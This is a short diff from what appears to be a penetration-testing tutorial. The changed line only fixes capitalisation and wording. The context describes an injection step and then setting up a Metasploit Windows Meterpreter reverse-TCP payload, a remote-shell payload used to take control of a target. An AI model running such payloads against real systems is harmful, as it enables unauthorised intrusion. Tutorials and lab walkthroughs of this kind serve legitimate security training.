 A warning message appears and as soon as the injection is verified, you are asked to press the Enter key to continue.
 When you press the Enter key.

-In a new terminal type msfconsole to launch metasploit framework and execute following command
+In a new terminal type msfconsole to launch Metasploit framework and execute the following command

 set payload windows/meterpreter/reverse_tcp